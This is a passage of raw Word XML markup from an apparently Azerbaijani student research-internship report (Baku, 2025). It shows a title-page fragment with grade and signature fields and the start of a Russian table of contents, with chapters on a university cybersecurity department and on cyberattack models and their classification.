        <w:p w14:paraId="3854DA9A" w14:textId="3CB65D01" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2A530D6E" w14:textId="5321DCA8" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4F36F360" w14:textId="0BEA0BE5" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006A407F">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="28"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>Təcrübə üzrə topladığı bal:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>____________</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>______       ____________</w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                               </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">  </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0A238F7B" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                                                                </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>(</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>rəqəm və hərflə</w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">  </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">        </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>(imza)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                   </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="114420DA" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7DAD0363" w14:textId="190A0D3E" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7167F602" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">      “_____”    ___________________   </w:t>
          </w:r>
          <w:r w:rsidRPr="008E12CE">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>2025-ci il</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">         </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3C558D1C" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                               </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="391331AE" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1C06E119" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="574BBE72" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1F81C107" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="02B5C5CD" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="38DC9525" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="535887F6" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="62952739" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6B66703F" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00D03E00">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2E70C4F2" w14:textId="7BA3B1D2" w:rsidR="00DE76DE" w:rsidRPr="00D008B7" w:rsidRDefault="00DE76DE" w:rsidP="00D008B7">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00116722">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>BAKI-20</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>25</w:t>
          </w:r>
          <w:r w:rsidRPr="00116722">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve"> il</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2EA39662" w14:textId="291BE6C4" w:rsidR="00F674E3" w:rsidRPr="00CC52B3" w:rsidRDefault="00CC52B3" w:rsidP="00F674E3">
          <w:pPr>
            <w:pStyle w:val="a9"/>
            <w:rPr>
              <w:lang w:val="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="ru-RU"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>Содержание</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A925AFA" w14:textId="446CD3C4" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="00F674E3" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc161761557" w:history="1">
            <w:r w:rsidR="00CC52B3">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A234E">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BB9219A" w14:textId="39C3B24F" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761558" w:history="1">
            <w:r w:rsidR="001C5EC3" w:rsidRPr="001C5EC3">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>ГЛАВА I. ОБЩЕЕ ЗНАКОМСТВО СО СТРУКТУРОЙ КАФЕДРЫ КИБЕРБЕЗОПАСНОСТИ АЗЕРБАЙДЖАНСКОГО ТЕХНИЧЕСКОГО УНИВЕРСИТЕТ</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A234E">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="684B09A7" w14:textId="335CCD26" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761559" w:history="1">
            <w:r w:rsidR="009E5355" w:rsidRPr="009E5355">
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="009E5355">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009E5355" w:rsidRPr="009E5355">
              <w:t>Составление рабочего графика практикан</w:t>
            </w:r>
            <w:r w:rsidR="009E5355">
              <w:t>та</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A234E">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21BE3D69" w14:textId="7C60B81C" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761560" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="az-Latn-AZ"/>
              </w:rPr>
              <w:t xml:space="preserve">1.2 </w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>Знакомство с научно-исследовательским опытом</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A234E">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A46B4A5" w14:textId="519591F6" w:rsidR="005759DA" w:rsidRPr="008D78D9" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761561" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">1.3 </w:t>
            </w:r>
            <w:r w:rsidR="00936C96" w:rsidRPr="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">Инфраструктура, </w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>и</w:t>
            </w:r>
            <w:r w:rsidR="00936C96" w:rsidRPr="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">сследовательские </w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>п</w:t>
            </w:r>
            <w:r w:rsidR="00936C96" w:rsidRPr="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">роблемы, </w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>о</w:t>
            </w:r>
            <w:r w:rsidR="00936C96" w:rsidRPr="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">бъекты и </w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>и</w:t>
            </w:r>
            <w:r w:rsidR="00936C96" w:rsidRPr="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>нструменты</w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00936C96" w:rsidRPr="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>Азербайджанск</w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>ого</w:t>
            </w:r>
            <w:r w:rsidR="00936C96" w:rsidRPr="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve"> Техническ</w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>ого</w:t>
            </w:r>
            <w:r w:rsidR="00936C96" w:rsidRPr="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve"> Университет</w:t>
            </w:r>
            <w:r w:rsidR="00936C96">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>а</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="008D78D9">
            <w:rPr>
              <w:lang w:val="ru-RU"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="258CED11" w14:textId="60CAE889" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761562" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">1.4 </w:t>
            </w:r>
            <w:r w:rsidR="004573DD" w:rsidRPr="004573DD">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>Сущность, содержание и цели научно-исследовательской практики</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008D78D9">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A6F77D3" w14:textId="162608EF" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761563" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">1.5 </w:t>
            </w:r>
            <w:r w:rsidR="00730D29" w:rsidRPr="00730D29">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>Анализ существующих возможностей во время научно-исследовательской практики в кафедре кибербезопасности</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008D78D9">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11549A8B" w14:textId="589F71A9" w:rsidR="005759DA" w:rsidRPr="0004332E" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761564" w:history="1">
            <w:r w:rsidR="0004332E" w:rsidRPr="0004332E">
              <w:t>ГЛАВА II. МОДЕЛИ КИБЕРАТАК И ИХ КЛАССИФИКАЦИЯ</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="0004332E">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A818C6">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75B98582" w14:textId="409A5ACD" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761565" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">2.1 </w:t>
            </w:r>
            <w:r w:rsidR="00D1673C">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Что такое модели кибератак и как они помогают в защите</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A818C6">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>7</w:t>
